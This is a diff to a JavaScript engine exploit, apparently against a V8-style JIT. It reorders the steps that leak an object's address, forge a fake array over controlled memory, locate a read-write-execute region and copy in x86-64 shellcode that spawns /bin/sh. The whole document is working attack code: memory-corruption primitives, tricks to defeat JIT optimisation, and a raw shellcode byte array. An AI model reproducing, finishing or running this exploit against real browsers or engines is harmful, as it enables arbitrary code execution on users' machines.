@@ -148,7 +148,6 @@ function main() {
148148 }
149149 //These are there to stop main being optimized by JIT
150150 globalIdx [ 'a' + globalIdx ] = 1 ;
151- let obj = [ 1.1 , 1.1 , 1.1 ] ;
152151 //Can't refactor this, looks like it cause some double rounding problem (got optimized?)
153152 for ( let i = 0 ; i < objArr . length ; i ++ ) {
154153 let thisArr = objArr [ i ] ;
@@ -173,29 +172,17 @@ function main() {
173172 let index = result . idx ;
174173
175174 let instanceAddr = ftoi32 ( larr [ index ] ) [ 0 ] ;
175+ let instanceFloatAddr = larr [ index ] ;
176176 console . log ( "found instance address: 0x" + instanceAddr . toString ( 16 ) + " at index: " + index ) ;
177+ let x = { } ;
177178 for ( let i = 0 ; i < objArr . length ; i ++ ) {
178179 let thisArr = objArr [ i ] ;
179- thisArr . fill ( obj ) ;
180+ thisArr . fill ( x ) ;
180181 }
181- globalIdx [ 'a' + globalIdx + 2000 ] = 1 ;
182-
183- let addr = ftoi32 ( larr [ index ] ) [ 0 ] ;
184- let objEleAddr = addr - 0x20 + 0x8 ;
185- let floatAddr = i32tof ( objEleAddr , objEleAddr ) ;
186- let floatMapAddr = i32tof ( mapAddr , mapAddr ) ;
187- //Faking an array at using obj[0] and obj[1]
188- obj [ 0 ] = floatMapAddr ;
189- let eleLength = i32tof ( instanceAddr + rwxOffset , 10 ) ;
190-
191- obj [ 1 ] = eleLength ;
192182
193- larr [ index ] = floatAddr ;
194-
195- console . log ( "array address: 0x" + addr . toString ( 16 ) ) ;
196- console . log ( "array element address: 0x" + objEleAddr . toString ( 16 ) ) ;
183+ globalIdx [ 'a' + globalIdx + 5000 ] = 1 ;
197184
198- let rwxAddr = 0 ;
185+ larr [ index ] = instanceFloatAddr ;
199186 let objArrIdx = - 1 ;
200187 let thisArrIdx = - 1 ;
201188 for ( let i = 0 ; i < objArr . length ; i ++ ) {
@@ -204,21 +191,46 @@ function main() {
204191 let thisArr = objArr [ i ] ;
205192 for ( let j = 0 ; j < thisArr . length ; j ++ ) {
206193 let thisObj = thisArr [ j ] ;
207- if ( thisObj != obj ) {
208- console . log ( "fake array at: " + i + " index: " + j ) ;
194+ if ( thisObj == instance ) {
195+ console . log ( "found instance object at: " + i + " index: " + j ) ;
209196 objArrIdx = i ;
210197 thisArrIdx = j ;
211- if ( ! ( thisObj instanceof Array ) ) {
212- console . log ( "failed getting fake array." ) ;
213- restart ( ) ;
214- return ;
215- }
216- rwxAddr = thisObj [ 0 ] ;
217- console . log ( "rwx address at: 0x" + ftoi ( rwxAddr ) . toString ( 16 ) ) ;
218198 }
219199 }
220200 }
221201 globalIdx [ 'a' + globalIdx + 4000 ] = 1 ;
202+ if ( objArrIdx == - 1 ) {
203+ console . log ( "failed getting fake object index." ) ;
204+ restart ( ) ;
205+ return ;
206+ }
207+ let obj = [ 1.1 , 1.1 , 1.1 ] ;
208+ let thisArr = objArr [ objArrIdx ] ;
209+ thisArr . fill ( obj ) ;
210+ globalIdx [ 'a' + globalIdx + 2000 ] = 1 ;
211+
212+ let addr = ftoi32 ( larr [ index ] ) [ 0 ] ;
213+ let objEleAddr = addr + 0x18 + 0x8 ;
214+ let floatAddr = i32tof ( objEleAddr , objEleAddr ) ;
215+ let floatMapAddr = i32tof ( mapAddr , mapAddr ) ;
216+ //Faking an array at using obj[0] and obj[1]
217+ obj [ 0 ] = floatMapAddr ;
218+ let eleLength = i32tof ( instanceAddr + rwxOffset , 10 ) ;
219+
220+ obj [ 1 ] = eleLength ;
221+
222+ larr [ index ] = floatAddr ;
223+ console . log ( "array address: 0x" + addr . toString ( 16 ) ) ;
224+ console . log ( "array element address: 0x" + objEleAddr . toString ( 16 ) ) ;
225+ let rwxAddr = 0 ;
226+ let fakeArray = objArr [ objArrIdx ] [ thisArrIdx ] ;
227+ if ( ! ( fakeArray instanceof Array ) ) {
228+ console . log ( "fail getting fake array." ) ;
229+ restart ( ) ;
230+ return ;
231+ }
232+ rwxAddr = fakeArray [ 0 ] ;
233+ console . log ( "rwx address at: 0x" + ftoi ( rwxAddr ) . toString ( 16 ) ) ;
222234
223235 if ( rwxAddr == 0 ) {
224236 console . log ( "failed getting rwx address." ) ;
@@ -228,15 +240,12 @@ function main() {
228240
229241 //Read shellArray address
230242 let shellArray = new Uint8Array ( 100 ) ;
231- let thisArr = objArr [ objArrIdx ] ;
243+ thisArr = objArr [ objArrIdx ] ;
232244 thisArr . fill ( shellArray ) ;
233245
234246 let shellAddr = ftoi32 ( larr [ index ] ) [ 0 ] ;
235247 console . log ( "shellArray addr: 0x" + shellAddr . toString ( 16 ) ) ;
236248 obj [ 1 ] = i32tof ( shellAddr + 0x20 , 10 ) ;
237- //Place fake array back into objArr[objArrIdx][thisArrIdx]
238- larr [ index ] = floatAddr ;
239- let fakeArray = objArr [ objArrIdx ] [ thisArrIdx ] ;
240249 fakeArray [ 0 ] = rwxAddr ;
241250 var shellCode = [ 0x31 , 0xf6 , 0x31 , 0xd2 , 0x31 , 0xc0 , 0x48 , 0xbb , 0x2f , 0x62 , 0x69 , 0x6e , 0x2f , 0x2f , 0x73 , 0x68 , 0x56 , 0x53 , 0x54 , 0x5f , 0xb8 , 0x3b , 0 , 0 , 0 , 0xf , 0x5 ] ;
242251 for ( let i = 0 ; i < shellCode . length ; i ++ ) {